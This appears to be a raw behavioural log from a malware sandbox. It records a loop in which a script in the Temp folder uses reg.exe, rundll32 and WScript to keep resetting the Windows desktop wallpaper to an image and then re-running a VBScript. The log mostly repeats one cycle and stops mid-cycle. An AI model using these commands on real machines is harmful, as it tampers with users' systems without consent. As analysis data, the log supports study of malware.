reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

